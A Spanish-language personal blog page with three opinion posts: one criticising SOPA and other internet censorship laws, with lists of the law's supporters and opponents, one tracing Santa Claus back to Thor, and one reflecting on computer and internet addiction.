|_ocutus

Ley SOPA, PIPA, SINDE, Hadopi, Cert-In... Llego la censura a internet?

2012-01-17T22:58:00.014-03:00

la censura existe practicamente desde siempre, no hay registros prehistoricos (creo...), pero desde q un hombre, o mas bien un grupo, quiso controlar a otro de una manera mas sutil q la fuerza hizo de la censura una de sus armas preferidas. La teoria es q si alguien no tiene conocimiento de algo no se va a ver "tentado" por ello y seguira feliz con lo poco q conoce... pero...

quien tiene la autoridad para decir q es lo q se puede ver y lo q no? lo q es correcto o incorrecto, bueno o malo. la respuesta es muy facil, nadie mas q uno mismo. la unica forma de hacer una eleccion libre sobre algo es conocer todas las posibilidades y tomar una desicion en base a eso. x lo menos asi es como funciona para mi.

hace solo unas decadas era mas facil censurar, el mundo no estaba tan interconectado y bastaba con cuidar q entraba o se mostraba en un determinado pais o territorio. peliculas y libros q se prohibian, gente q no podia "entrar" o "hablar" y si molestaban mucho hasta desaparecian en algun momento oscuro de nuestra historia.

llevemoslo al dia de hoy, un resultado q se borra en un buscador, un link de descarga q se elimina... pequeñas censuras q separadas no se notan mucho pero q juntas forman un gran entramado de prohibicion. y x otro lado la "pirateria"... en realidad esta mal q el q no tiene $$ para comprar el libro q necesita para estudiar se baje un ebook gratis? solo puede tenerlo el q pueda pagar los 50 euros q vale? como se supone q haga un indigente de africa para leerlo?

esta bien pagar lo q vale un cd de musica cuando al autor le llega un porcentaje de risa y el costo del soporte fisico es casi nada? esta bien q la discografica gigantesca se llene de $$ con el trabajo de otro?

censura en internet

aunque la mayoria de los mortales no se den cuenta, la censura en internet existe hace unos cuantos años en mayor o menor medida. algunos lo hacen abiertamente desde tiempos remotos como china, donde ya en el 96 se dice q habia filtros y desde 2003 funciona el "Great Firewall of China" q es nada menos q un firewall a nivel nacional q analiza el trafico de todo el pais permitiendo o impidiendo las conexiones al exterior. blockeos x rangos de ip, filtros de url, dns arreglados... lo normal, tampoco algo q alguien con conocimientos medios no pueda saltarse. muchos usan VPNs para saltarlo pero obviamente la mayoria no tiene idea de como hacerlo ademas de q ya deben estar acostumbrados a su mini-internet con contenido de disney.

todo esto se regulo x medio de leyes q incluyen la prohibicion de publicar algo contra el gobierno (o el sistema socialista), la constitucion, organos del estado, leyes y montones de cosas mas. debido a esto se le dieron años de carcel a algunos x simples publicaciones en blogs en contra del sistema y otras atrocidades varias tipicas de un sistema represor amigo de la censura. a china se suman iran, turquia, corea y algunos mas en la censura fuerte pero muchos otros van de a poco x el mismo camino...

en australia tuvieron la idea x 2008 de solicitar a los ISPs q instalen sistemas de filtrado en nombre de blockear pornografia infantil y terrorismo pero... a poco de q el sistema estuvo funcionando empezaron a cerrar tambien paginas de satanismo, eutanasia y hasta un dentista de queensland q vaya a saber con quien se metio... je

en francia esta la famosa ley "hadopi" q desde 2009 controla las descargas y establece q el usuario puede recibir hasta 3 avisos antes de ir ante el juez q le puede poner una multa o simplemente cancelar su conexion a internet x bajar contenido con copyright. la empresa TMG controla las descargas a nivel nacional y pasa la info a la justicia. el año pasado sufrieron un hackeo q expuso datos de miles de usuarios de bittorrent monitoreados... y no todos estaban en territorio frances...

en india se creo el cert-in en 2003, no se sabe muy bien con q conceptos blockea ni da muchas explicaciones, pueden caer desde paginas de material obsceno hasta grupos nacionalistas o radicales. en 2003 x ejemplo se les blockeo el acceso a yahoo a miles de usuarios sin razon aparente. desde 2008, cuando los terroristas responsables del ataque a mumbay dijeron q usaron google earth para planearlo se blockeo el acceso para todo el pais.

en argentina tuvimos la caza de brujas con el p2p hace unos años, agarraron un par de pibes q bajaban mp3 y alguna abuelita... no creo q ninguna causa haya llegado a mucho ya q era un circo, pero los blockeos en los resultados de google siempre existen. en 2008 la jueza servini de cubria habia hecho q yahoo y google de argentina blockearan resultados con su nombre... q ignorante... x esa fecha o un poco despues al hacer una busqueda con la palabra "maradona" en yahoo devolvia el texto:

“Con motivo de una orden judicial solicitada por partes privadas, nos hemos visto obligados a suprimir temporalmente todos o algunos de los resultados relacionados con ésta búsqueda.”

y los q todavia no tienen blockeos estan en proceso con alguna ley, sinde, sopa, pipa, acta... todo lo mismo, basura censista.

la ley sopa

“Aquel que sacrifica la libertad en pos de la seguridad no merece ninguna de las dos.”

- Benjamin Franklin

...y no lo dije yo, lo dijo el q tienen en el billete de 100. q verguenza una nacion q se llena la boca hablando de la libertad, igualdad, democracia y toda la propaganda con la q lavan el cerebro al planeta promueva la censura de contenidos.

en resumen el proyecto permite al dto de justicia de usa obtener ordenes judiciales contra las webs q acusen de infringir copyright... o facilitar el proceso... aun encontrandose fuera de su territorio. una vez conseguida la orden pueden instar a los ISP, redes de publicidad o comercio electronico a q no hagan negocios con ellos, ademas de ordenar a los motores de busqueda como google q los saquen de sus resultados

a 1era vista no parece tan terrible, digamos q una web aloja contenido con copyright o enlaces, sacando ademas un provecho economico. se cierra, es ilegal. pero pensemos en los sitios q alojan contenido de usuarios como puede ser youtube x ejemplo. cuantos links de youtube deberian cerrarse? xq no es solo la pelicula o el video con copyright, si x ejemplo se te ocurre hacer un video y ponerle de fondo musical un tema de rammstein tambien estas infringiendo los derechos de la discografica... soportaria eso youtube?... no creo q x mucho tiempo.

ni hablar de webs como cuevana, seriesyonkis u otros mas "serios" como vimeo o flickr. tambien olvidense de poner una url en el navegador y ver su pelicula o serie favorita. foros de warez, moviez y todas las Zs q se les ocurran cerrados de la mañana a la noche. y solo seria el principio...

ahhh... las penas van desde 5 años de sentencia x streaming de contenido cuya licencia valga mas de 2500usd, aun siendo usuario no-comercial. no queda muy claro si subiendolo o simplemente descargando...

hasta donde?

si usa hace algo x lo gral la mayoria lo sigue asi q no se tranquilicen pensando q no les va a llegar. ademas todo lo "ilegal" hosteado alla tendria q moverse a tierras con menos control con los gastos q eso implica. seguramente muchos van a desaparecer en el proceso... de lo q pueden estar seguros es q si se aprueba va la ley a sentar un precedente importante para las demas naciones.

el problema principal esta en el blockeo (la censura) en si, para empezar, para ejercerlo habria q empezar a tener muchisimo mas control del trafico poniendo en riesgo la privacidad. los blockeos q van a imponer son los tipicos de DNS o rangos de IPs. los 1eros en realidad no son muy "sanos" ya q un dns "tocado" para blockear una url no tiene diferencia ante el cliente con uno al q se le hizo un poisoning, llegado el caso no se sabria si el cambio lo hizo el gobierno o un intruso con intenciones oscuras. bah... los 2 tienen "intenciones oscuras" en realidad.

ademas como paso en otros lugares seguramente empezaran con links ilegales y terminaran con algun otro "dentista distraido", pasando por blogs con contenido q no sea correctamente politico o q ofrezcan informacion peligrosa para el conocimiento de las masas (wikileaks les suena?). simplemente el control total de internet para poder cerrar lo q se les antoje. quien se va a fijar si x ejemplo cierran este blog? o miles como este? silenciando voces aca y alla de a poco.

se puede saltar la censura?

si, se puede... todo se puede. obviamente las medidas no son un impedimento para un usuario con conocimientos medios de redes, pero el usuario comun no sabe como cambiar sus dns, cuales usar o llegado el caso como configurar un proxy o una vpn. los promotores de la ley lo saben bien y tambien saben muy bien q el 95% de la pirateria viene de ahi, lo q ellos llaman el "pirata casual".

lo q no tienen en cuenta es q se les puede facilitar el trabajo a los mortales con addons, scripts o pequeños softwares. un ejemplo es el add-on para firefox de mafiaafire q usa una serie de proxys al azar para saltarse las restricciones:

https://addons.mozilla.org/en-US/firefox/addon/mafiaafire-piratebay-dancing/

este proyecto empezo cuando blockearon the pirate bay en italia, belgica, finlandia y algun otro pais. el año pasado el "Department of Homeland Security" pidio q firefox q lo saque de su web pero estos se negaron. habra q ver q pasa despues de la ley... el plugin no va a dejar de existir pero blockeado en la pagina de firefox va a ser mas dificil de encontrar, ademas de q seguramente se van a suprimir los resultados en los buscadores.

despues de 5 o 10 años la gente ya va a estar acostumbrada a los blockeos y ya no le va a parecer raro, las nuevas generaciones simplemente van a conocer esa internet y solo un porcentaje bastante pequeño va a poder acceder mas alla de los gigantescos firewalls nacionales. despues de todo hasta el principal diseñador del firewall chino, Fang Binxing, confiesa usar VPNs para saltarse las restricciones.

se puede parar la pirateria?

la pirateria siempre existio, desde la epoca en q se copiaba el soft en un cassette de cinta magnetica hasta la epoca del bluray e internet. ciertamente no va a dejar de existir xq unos senadores yankees crean q pueden censurar internet como si se tratara de una revista barata, lo q va a pasar es q no todos van a tener acceso a las cosas y seguramente se incremente la venta callejera ilegal y los packs q venden x correo.

hablandolo mi amigo elektro me decia... "sin ser pro-legalizacion, es como el tema de la droga, al hacerla ilegal solo pueden manejarla carteles, mafiosos y delincuentes. lo q no hace q la gente deje de consumirla sino q crea todo un gran negocio de corrupcion y muerte donde algunos se benefician."

si no se pueden ver peliculas en cuevana van a tener q comprarlas en el puestito de la esquina, pueden estar seguros de q el q las graba sabe como seguir bajandolas saltandose lo q sea... y tambien pueden estar seguros de q va a subir el precio.

pero los gigantes monopolicos q apoyan la ley creen q es la solucion y tratan de dar el ultimo manotazo de ahogado antes de q el nuevo mundo los desaparezca del mapa. la lista de organizaciones apoyando la SOPA es la siguiente:

AFL-CIO

Motion Picture Association of America

Independent Film & Television Alliance

National Association of Theatre Owners

Deluxe Entertainment Services Group Inc.,

National Music Publishers' Association

American Federation of Musicians

Directors Guild of America

International Brotherhood of Teamsters

Screen Actors Guild

National Cable & Telecommunications Association

Recording Industry Association of America

Alliance for Safe Online Pharmacies

Comcast

NBC Universal

Pharmaceutical Research and Manufacturers of America

National Association of Manufacturers

Concerned Women for America

Viacom

National Criminal Justice Association

National District Attorneys Association

Council of State Governments

International Trademark Association

International Brotherhood of Electrical Workers

International Association of Fire Fighters

U. S. Chamber of Commerce

Americans for Tax Reform

Let Freedom Ring

Outdoor Industry Association

National Electrical Manufacturers Association

Ford Motor Company

Automotive Aftermarket Industry Association

Underwriters Laboratories Inc.

Society of Plastics Industry

Small Business and Entrepreneurship Council

Software & Information Industry Association

Entertainment Software Association

American Association of Independent Music

Eli Lilly and Company

Merck

Specialty Equipment Market Association

Universal Music Group Inc.

Pfizer

Association of American Publishers

News Corporation

Xerox Corporation

Walmart

Dow Chemical

Alliance of Automobile Manufacturers

National Confectioners Association

Estee Lauder Companies

CBS Corporation

National Basketball Association

Greeting Card Association

Advanced Medical Technology Association

Beam Global Spirits &Wine

Adidas America

Acushnet Company

ABRO Industries, Inc.

1-800-PetMeds

1-800 Contacts, Inc.

Blue Sky Studios, Inc.

Bose Corporation

Warner Music Group

Major League Baseball

Burberry

Electronic Components Industry Association

HarperCollins Publishers

Kekepana International Services

LVMH Moët Hennessy Louis Vuitton

Nike, Inc.

Taylor Made Golf Company, Inc.

Timberland Company

Time Warner

Sporting Goods Manufacturer's Association

3M Company

National Retail Federation

Retail Industry Leaders Association

Viacom

Philip Morris International

National Association of Broadcasters

Disney

MacMillan

Center for Individual Freedom

National Governors Association

National Football League

International Union of Police Associations

Graphic Artists Guild

International AntiCounterfeiting Coalition

United States Tennis Association

Associated Builders and Contractors

Christian Music Trade Association

National Narcotics Officer's Associations' Coalition

Elsevier

Ultimate Fighting Championship

United States Conference of Mayors

Church Music Publishers Association

Major County Sheriffs Association

Visa

Copyright Alliance

American Federation of Television & Radio Artists

International Alliance of Theatrical and Stage Employees

National Songwriters Association

Minor League Baseball

Coalition Against Online Video Piracy

Letter of Council

Capitol Records Nashville

Church Music Trade Association

American Society of Composers, Authors & Publishers

Country Music Association

Country Music Television

EMI Christian Music Group

Lost Highway Records

Gospel Music Association

MCA Records

Mercury Nashville

Provident Music Group

Republic Nashville

Showdog Universal

UMG Publishing Group

Warner Music Nashville

Word Entertainment

BMG Chrysalis

BMI

Cengage Learning

EMI Music Publishing

L'Oreal

Hachette Book Group

Publishers Worldwide, Inc.

Hyperion

McGraw-Hill Education

MPA - The Association of Magazine Media

Pearson Education

Penguin Group

Perseus Books Group

Random House

Scholastic, Inc.

W.W. Norton Company

Wolers Kluwer Health

True Religion Brand Jeans

National Sheriff's Association

COTY, Inc.

Major City Chiefs

National Troopers Coalition

National Center for Victims of Crime

National Domestic Preparedness Coalition

Association of State Criminal Investigative Agencies

National Association of Fusion Center Directors

National Association of Prosecutor Coordinators

National Association of State Chief Information Officers

Association of Talent Agents

Council of the Better Business Bureau

State International Development Organizations

Beachbody LLC

Tiffany & Company

la lista en contra:

Creators’ Freedom Project

Engine Advocacy

4chan

Boing Boing

Creative Commons

Daily Kos

Disqus

Grooveshark

Hype Machine

Kickstarter

MetaFilter

O'Reilly Radar

Techdirt

Torrentfreak

Go Daddy

NetCoalition

Consumer Electronics Association

Computer and Communications Industry Association

Public Knowledge

Electronic Frontier Foundation

EDUCAUSE

Open Internet Coalition

Bloomberg

Google

Yahoo

Center for Democracy & Technology

Business Software Alliance

Twitter

Zynga

Facebook

AOL

Marc Andreessen, co-founder of Netscape and Andreessen Horowitz

Sergey Brin, co-founder of Google

Jack Dorsey, co-founder of Twitter and Square

Caterina Fake, co-founder of Flickr and Hunch

David Filo, co-founder of Yahoo!

Reid Hoffman, co-founder of LinkedIn

Arianna Huffington, co-founder of The Huffington Post

Chad Hurley, co-founder of YouTube

Brewster Kahle, founder of the Internet Archive and co-founder of Alexa Internet

Elon Musk, co-founder of PayPal

Craig Newmark, founder of craigslist

Pierre Omidyar, founder of eBay

Biz Stone, co-founder of Obvious and Twitter

Jimmy Wales, founder of Wikipedia and the Wikimedia Foundation

Evan Williams, co-founder of Blogger and Twitter

Jerry Yang, co-founder of Yahoo!

Progressive Change Campaign Committee

Tumblr

Mozilla

Union Square Ventures

MoveOn

Wikimedia Foundation

eBay

Reddit

American Civil Liberties Union

Consumers Union

American Library Association

Computer & Communications Industry Association

Human Rights First

Consumer Federation of America

Human Rights Watch

Microsoft

United States Student Association

Irregular Times

TechNet

Information Technology Industry Council

Association of Research Libraries

Entertainment Consumers Assocation

Writers Guild of America, West

Reporters Without Borders

Freedom House

Association of College and Research Libraries

Competitive Enterprise Institute

TechAmerica

TechFreedom

Demand Progress

U.S. Public Interest Group

Internews

New America Foundation’s Open Technology Initiative

Center for Media Justice

Center for Rural Strategies

Brookings Institute

American Society of News Editors

Benetech

Rackspace

OpenDNS

Stack Overflow

no hace falta hacer mucha comparacion, las listas hablan x si solas. el 23 se espera el "blackout day" tambien llamada la "opcion nuclear" en la q las grandes webs amenazan con bajar sus servers todo el dia en protesta de la ley q se vota el 24. a medida q pasan las horas mas portales se van sumando, algunas de los mas importantes son:

Google

Yahoo!

Facebook

Foursquare

Twitter

Wikipedia

Amazon

Mozilla

AOL

eBay

PayPal

IAC

LinkedIn

OpenDNS

Zynga

como sera un dia sin google, paypal, ebay, sin las adictivas redes sociales, sin la wikipedia?... como sera el futuro de internet? la informacion seguira siendo libre o solo para "unos pocos"? hoy mismo tendremos una pequeña aproximacion de lo q va a pasar ya q unas cuantas webs cierran a modo de protesta, entre ellas la version en ingles de wikipedia.

los q no tienen idea mejor apurense a aprender algo de redes antes de q no se puedan bajar ni un tutorial para abrir puertos en el router x ser material q "instiga a la pirateria".

Santa Claus, Papa Noel, San Nicolas... o Thor?

2011-11-24T17:23:00.008-03:00

llega otra navidad y los comerciantes se preparan a vender millones mientras los mas chicos esperan la llegada de "papa noel". cada año q pasa parece tener mas protagonismo en la navidad a pesar de ofrecernos una imagen q absolutamente nada tiene q ver con nuestras tierras, un diciembre con mas de 30 grados, una ciudad casi sin chimeneas y por supuesto su ridicula gorda figura montada en un trineo tirado por renos(?).

alguien se puso a analizar q tiene q ver este personaje con el "nacimiento de cristo"? por suerte, siendo ateo tengo menos tabues y mas incredulidad y tal vez x eso me lo pregunto. bueno, santa claus, san nicolas, algun santo debe ser y algo tendra q ver aunque sea a lo lejos pero... parece q la festividad de san nicolas la suprimio el papa Paulo IV en 1969 junto con la de unos cuantos mas por no haber pruebas de su existencia y x lo tanto fueron considerados "personajes legendarios". en resumen hay muchas historias pero nada q demuestre q haya existido jamas.

San Nicolas, Santa Claus o Papa Noel?

se dice q Nicolas de Mira (san Nicolas) murio en el año 342, se le adjudicaban poderes de dar regalos secretamente, como poner monedas en los q dejaban los zapatos fuera por el. su popularidad fue extendiendose por toda europa y por supuesto adoptando diferentes nombres segun el idioma del original Nikolaos se paso a Nicolas, Nicholas para los ingleses, Sankt Nikolaus para los alemanes, y en holanda le agregaron el "Herr" quedando Sanct Herr Nicholaas desde donde se abrevio a Sinterklaas.

al parecer los inmigrantes holandeses llevaron el nombre a usa en el sXVII donde paso de Sinter Klaas a Santa Claus... parece retorcido pero recien estamos empezando... je

de donde sale "papa noel" entonces? parece q a mediados del sXIX el renovado san nicolas vuelve a inglaterra con el nombre de santa claus, de ahi pasa a francia donde se mezcla con "Bonhomme Noël" q es la personificacion de la navidad en esas tierras. Bonhomme q podria ser traducido literalmente como "buen hombre" es el titulo q se le daba antiguamente a alguien del pueblo comun, algo asi como "señor". pero hay q ver la diferencia entre "bonhomme" y "monsieur", este ultimo era usado para los señores de la nobleza. noel por supuesto se traduce como navidad, lo q nos dejaria algo parecido a "el buen hombre de la navidad"

al no existir la diferencia ni el doble sentido de la palabra en castellano, no tenia mucho sentido ponerle "señor navidad" o "señor noel", entonces para resumir el "buen hombre" el "señor" y todo eso a alguien se le ocurrio nombrarlo "papa" tratando de resumir el sentido de la traduccion en una palabra... y bue... peores traducciones meten en los titulos de las pelis... je

x supuesto q a nosotros no nos llega nada absolutamente de la historia de san nicolas, aceptamos a papa noel solamente xq sale en las peliculas yankees y en la botella de coca-cola de diciembre. lo triste es q no termina ahi, hace unos años adoptamos la fiesta de san patricio (increible...) y halloween viene pegando fuerte. obvio q tampoco son inventos yankees sino tambien productos de marketing como el viejo san nicolas.

La metamorfosis

las primeras representaciones ya en america lo mostraban mas como un duende q el gordo risueño q vemos hoy, en 1823 Clement Clarke Moore publico un poema donde asi lo describia, ademas viajando en su trineo tirado por nueve renos. Cuando paso a francia ya tenia un cierto parecido fisico pero se vestia de blanco y dorado mientras q los yankees lo representaban mayormente vestido de verde aunque hay algunas representaciones del sXIX en rojo y blanco.

la version casi final la creo Haddon Sundblom bajo encargo de coca-cola en 1931, la idea era hacerlo mas humano y acorde con la imagen de la empresa y el marketing de la epoca. Basandose en la imagen del poema de moore siguio dibujandolo durante 33 años y se convirtio en el creador de la imagen moderna de sinterklaas.

pero en realidad podriamos ir mucho mas atras de sundblom y moore, antes de q los holandeses emigraran a america, todavia antes de ser descubierta y antes del mismisimo Nikolaos de Myra...

si nicolas tiene todas las chances de ser mitologico, xq no ir mas atras todavia? ya mucho antes se creia en alguien q tenia una larga barba blanca, viajaba volando en su carroza tirada por Cracker y Gnasher, vivia en "la tierra del norte", y bajaba por las chimeneas todos los años el 25 de diciembre para dejar regalos a los niños.

santa claus? san nicolas? papa noel? no... THOR "el dios del trueno"...

Papa Noel es Thor?

obviamente no podemos guiarnos mucho por la imagen de thor q nos muestra hollywood. la representacion original es mas la de un hombre jovial y gordo con una gran barba blanca q viajaba en su carroza tirada por dos cabras (gnasher y cracker). en los antiguos hogares escandinavos se le consagraba la chimenea hogareña, la cual usaba para bajar hacia su elemento (el fuego). ellos extendieron estas creencias durante los siglos VII a XI con las invasiones de los vikingos junto con Odin y toda su mitologia.

el simbolo de thor es un gran martillo, q es el simbolo del carpintero, igual q santa claus. los dos tienen duendes q los ayudan, en el caso de thor son los q hicieron el martillo. era considerado un dios benevolo q jamas lastimaba a los humanos y siempre estaba dispuesto a ayudarlos y protegerlos. vive en el norte y se convitio en el yule-gott (dios de la navidad) despues de luchar contra los gigantes de hielo y nieve.

su vestimenta se caracterizaba justamente por el blanco de la nieve y el rojo de su elemento (fuego) y en su cumpleaños (25 de diciembre) bajaba por la chimenea a dejar regalos

en suecia todavia esperan en navidad al Jultomten en su carro tirado por cabras (Julbocker) vistiendo su traje rojo y blanco y su larga barba. su representacion es parecida a la de un duende de jardin pero se refiere a thor y no a la version coca-cola.

thor esta en mas lugares de lo q parece, el dia jueves en ingles es justamente su dia... "Thor's day". En castellano corresponde a Jupiter, el "dios del trueno" de la mitologia romana.

pero no es q lo diga yo simplemente, la siguiente es la traduccion de un parrafo q escribe la mitologista Adeline Guerber en su libro Myths of the Northern Lands (mitos de las tierras del norte):

Thor era el dios de los campesinos y la gente comun. Era representado como un hombre mayor, jovial y amigable, de contextura grande, con una larga barba blanca. Su elemento era el fuego, su color el rojo. El retumbar y rugido del trueno se decia q era causado por el paso de su carroza, porque solo el entre los dioses jamas monto a caballo pero conducia una carroza tirada por dos cabras blancas (llamadas Cracker y Gnasher). Lucho contra los gigantes de hielo y nieve y por lo tanto se convirtio en el "Dios de la Navidad". Se decia que vivia en la "Tierra del Norte" donde tenia su palacio entre los icebergs. Era considerado por nuestros paganos antepasados como el dios alegre y amigable, nunca lastimando a los humanos pero siempre ayudandolos y protegiendolos. En todos los hogares, la chimenea estaba especialmente consagrada a el, y se decia que bajaba a traves de la chimenea hacia su elemento, el fuego. (Guerber, H.A. Myths of Northern Lands. New York: American Book Company, 1895, p. 61)

solo tienen q googlear un rato para ver q la representacion original de thor tiene demasiados parecidos con "papa noel" a pesar de los siglos, cambios de nombre, marketing y unos animales mas "vendibles" q las cabras para tirar su trineo.

Basta de comprar basura yankee!!

en algunos lugares ya se estan dando cuenta del lavado de cerebro q les hacen y por ejemplo en españa suele haber protestas a favor de los reyes magos y en contra del foraneo "papa noel". en alemania los catolicos quieren hacer entender a la sociedad q el barrigon de barba es un producto publicitario tratando de recuperar a san nicolas. crearon "weihnachtsmannfreie zone", algo asi como la "zona libre de papa noel" y hacen diferentes actividades mientras meten propaganda anti-yankee.

aca en argentina por el contrario cada vez parece tener mas fuerza, a pesar de las gotas de transpiracion q le caen al q le toca disfrazarse y la falta de saber realmente q es lo q se festeja.

sepan de ahora en adelante q lo q festejan es el cumpleaños de Thor, el dios del trueno... malditos paganos... xD

Adiccion a las computadoras, a internet, nomofobia, tecnofilia... los males de la era moderna xD

2011-10-26T13:42:00.018-03:00

hace dos decadas el titulo hubiera sido tema para una peli sci-fi, hoy ya es realidad. siempre me acuerdo cuando le decia a mi vieja "un dia todos van a tener una computadora" y se me reia en la cara. en ese entonces me pasaba muchas horas sentado programando, jugando jueguitos y haciendo la mayoria de las cosas q hace un niño o adolescente hoy en dia, cosa que no era considerada muy "normal" en ese momento.

en la epoca de las spectrum, commodore y msx se estaba muy lejos de la masividad, la info se conseguia en revistas y libros (o de boca en boca) y los juegos se crackeaban y grababan en cassettes de audio donde tardaban 15 mins en cargar 48k. las computadoras eran bastante caras y dificiles, a menos q quisieras jueguitos para lo q solo necesitabas saber escribir load "". existian la mayoria de los lenguajes de programacion q hay hoy en dia, 64kb de ram era muchisimo y no habia soft para todo como ahora... era "la epoca en q los hombres hacian sus propios programas"... je

ya casi desde la niñez fui considerado "adicto a las computadoras", x supuesto q hoy seria completamente normal y hasta "moderado". todo siempre depende del punto de vista del observador...

pasaron los años, vino la epoca de las pcs y algunos empezaron a encontrar las ventajas de tener una. algunos de ellos se pasaron meses jugando al prince of persia, el stunts o algun jueguito de esa epoca, y ya no era una adiccion "desde su punto de vista". poco a poco las computadoras se empezaban a usar en las empresas y los paquetes de oficina eran utiles para encontrar trabajo para mucha gente.

despues se empezo a extender el tema de las redes, de las prehistoricas bbs donde se la pasaban esos adictos durante horas pasamos poco a poco a internet, windows95, dialup, 56K!!... la epoca dorada, esos pocos millones de usuarios conectados, creandose mas y mas "adictos" cada dia... xD

para fines de siglo salia el napster, todos querian internet para bajar musica y se la pasaban tambien horas sentados frente a la maquina mientras otros no entendian q encontraban en "esa pantallita". recuerdo la vez q le explicaba a mis amigos lo q era el mp3 y me preguntaban "para q queres tener tanta musica en un cd?"... "es una especie de adiccion?"... un par de años despues ya tenian centenares de discografias q no escuchan nunca como todo el mundo.

en esa epoca tuve mi 1er pocketpc y era un adicto x andar con una compu de bolsillo, no solo en ese momento sino hasta hace unos 5 o 6 años todavia parecia "raro". cosa q hoy todo el mundo tiene en su smartphone, y el q no lo tiene lo tendra en los proximos 5 años seguramente...

son todos adictos tambien ahora?... o todo depende del punto de vista?

adiccion a las computadoras

el termino (computer addiction) fue usado x 1era vez en el año 1979 por Nicholas Rushby en su libro An Introduction to Educational Computing. es x supuesto anterior a la adiccion a internet y se refiere a la gente q se la pasaba en la compu sin necesidad de las redes sociales, multimedia y todas las porquerias que hay ahora.

se podia dividir a grandes rasgos entre los q la usaban para jugar y los q la usaban para algo util, con terminos intermedios incluidos. yo creo q empece como el 1ero y termine como el 2do (con etapas gamer) casi sin darme cuenta y muy rapido. es en realidad el "adicto" q mas provecho saca de su adiccion ya q el placer esta simplemente en la maquina, dominarla, sacarle todo su jugo. cosa q es bien pagada y tiene muchas posibles salidas laborales ahora, a pesar de q en ese momento para la mayoria era "perder el tiempo".

algunos lo definian mas como un desorden del comportamiento q una adiccion, desorden q puede llevar a "problemas en la vida social, trabajo o escuela, gastar grandes cantidades de dinero en hardware, software y otros efectos negativos"...

... x supuesto q hoy la vida social esta en facebook, hi5 y twitter, la mayoria trabaja y estudia en una compu (algunos x internet) y todos gastan fortunas en el ultimo iphone, ipad o iloqsea solo para tener "lo ultimo".

entonces, segun la definicion de hace 30 años se podria decir q tenemos un par de miles de millones de "adictos a las computadoras"... puntos de vista...

adiccion a internet

la conexion a internet ya es un servicio casi tan necesario como la electricidad o el agua. todos estan conectados, todos tienen su facebook, su guindows trucho, su cuenta de messenger. la mayoria de la gente puede llegar a sentirse incomoda si no dispone de una conexion x demasiado tiempo, hay internet en el trabajo, en la casa, wifi q cubre casi todo... parece increible q esta encuesta sea de hace solo 15 años:

entonces nadie tenia idea de q era internet, era cosa de "nerds" (ahora "geeks") y lo mejor era q vivian perfectamente sin saberlo. ademas de sin celulares, sin gps, pantallas gigantes como las de los cuentos de bradbury, homebanking, etc.

con la llegada de toda esta gente a la red millones de nuevos "adictos" nacieron y se dividieron dando lugar a diferentes tipos mientras esta cambiaba para migrar al modelo mas comercial q tiene ahora. algunos los dividen en gamers, adictos al porno, a las redes sociales, shopping y juegos de apuestas online y hasta vi a uno catalogar la "adiccion de los hackers" como gente q busca compulsivamente informacion.

me parecio muy interesante la opinion de un tal dr goldberg que dice q en realidad son simplemente sintomas de otros desordenes ya existentes, la persona q se oculta hoy tras un chat es la misma q se ocultaba antes tras un telefono x ejemplo... o el jugador es tan jugador en la red como fuera de ella, la red es solo un medio para expresar el desorden.

lo q en el 95 o 96 era considerado "adiccion" en 2011 no llega ni al promedio. siendo uno de los 1eros "adictos" o "victimas del desorden" jamas tuve cuenta de facebook, twitter y casi no uso messengers... prefiero separar mi vida digital de mi vida fisica. es mas, todos deberian hacer lo mismo... se puede tener amigos sin facebook ;)

gente de todas las edades pasa horas y horas simplemente mirando y actualizando perfiles en redes sociales... es patetico. hasta puedo llegar a entenderlo en un adolescente pero hay mucha gente grande enloquecida, en el trabajo, en la casa... la verdad es q ahora soy yo el q no se explica q hacen tantas horas en la maquina, sin hacer nada, mirando lo q suben los demas, viviendo x fotos colgadas de un server en el otro lado del mundo. las maquinas no eran para eso... es estupido usarlas asi...

quien es el adicto ahora?... solo puntos de vista...

nomofobia

la nomofobia es una de las mas ridiculas, el nombre proviene de no-mobile phobia, algo asi como la fobia a no tener el celular. es definido como el miedo irracional a salir de casa sin el telefono, el afectado puede llegar a volver a la casa a buscarlo a pesar de cualquier cosa. siente q cualquier catastrofe podria pasar sin el estar "conectado".

la oficina de correos del reino unido hizo este año un estudio al respecto, sobre 2163 personas, el 53% siente ansiedad cuando no tienen el telefono o no lo pueden usar. de estos, el 9% se siente estresado cuando tienen el movil apagado. el nivel de stress de un nomofobico es comparable segun wikipedia al dia anterior a la boda o una visita al dentista.

sin embargo hace 15 años casi no existian, la gente hablaba x el telefono de linea cuando tenia ganas y no hacia falta estar mandando sms cada 10 minutos a todo el mundo. aca en argentina la fiebre maxima exploto a principios de siglo, de repente todos tenian su celular, desde el gerente importante hasta el recolector de basura. al principio era todavia mas ridiculo q ahora, gente q se veia q apenas tenia para vivir sacando el celu en el colectivo o el tren y llamando a la casa para decir "estoy viajando... llego en 20" y pagar x eso 50 veces mas q una comunicacion de linea.

de a poco fueron evolucionando, bajando un poco los precios, conectandose a internet cada vez mas rapido y con todo eso trajeron la red movil, conexion a redes sociales y messengers 24/7... y x supuesto mas necesidad de "vida digital".

me resisti a los celulares hasta hace unos 5 o 6 años, cuando ya se me hizo imposible x el trabajo y la sociedad en gral... je. siempre decia q iba a tener un celu cuando tuvieran un sistema operativo similar a una pc y asi fue. lo uso lo necesario para comunicaciones y mas q nada para reemplazar la pocket, ya no me miran tan raro cuando voy leyendo en una pantallita pero si todavia cuando voy mirando un capitulo de alguna serie o una peli... aunque no tanto como hace 10 años, cuando parecia un "adicto"... segun puntos de vista...

tecnofilia

por otro lado tenemos la tecnofilia q es una aficion o gusto x la tecnologia en gral. la tecnofilia parece englobar a todos los anteriores, el tecnofilo depende de la tecnologia y puede llegar a hacerse obsesivo de ella. se dice q actualmente la mayoria de las personas sufren algun grado de tecnofilia debido a las necesidades generadas x la sociedad.

pero ahora no solo todos son "adictos" sino q ademas es cool ser geek y todos quieren y muchos creen serlo, desde el q se baja o postea todo el soft raro q puede haber en taringa (aunque jamas lo use ni sepa hacerlo) hasta el q se cree guru de linux xq usa ubuntu hace 2 años. pasando x supuesto x el tipico script-kiddie q leyo 2 tutoriales de metasploit y se cree juaquer.

ciertamente el geek y el hacker estan en la posicion mas alta de la piramide, los q antes eran considerados "raros" son los q mueven el mundo ahora. la tecnofilia termina no siendo tanto un problema sino mas bien algo natural, normal hasta ciertos limites. hasta hay cursos para "ser hacker" o algunos q quieren parecer mas serios y ponen "analista en seguridad", el problema es q, aunque muchos quieran pensar lo contrario, un geek o un hacker no se hace en la universidad o con certificaciones... viene asi de fabrica... ;)

